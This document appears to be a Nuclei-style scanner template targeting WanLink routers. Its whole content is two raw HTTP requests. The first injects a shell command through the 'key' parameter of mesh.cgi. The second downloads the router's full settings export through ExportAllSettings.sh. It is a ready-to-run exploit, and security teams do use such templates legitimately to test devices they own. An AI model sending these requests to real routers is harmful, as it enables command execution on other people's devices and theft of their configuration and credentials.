id: wanlink-router-exportallSettings-readfile

info:
  name: wanlink-router-exportallSettings-readfile
  author: m0be1

http:
  - raw:
      - |
        GET /cgi-bin/mesh.cgi?page=upgrade&key=';ls>./1.txt;' HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip, deflate
        Connection: close

      - |
        GET /cgi-bin/ExportAllSettings.sh HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip, deflate
        Connection: close

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - status_code==200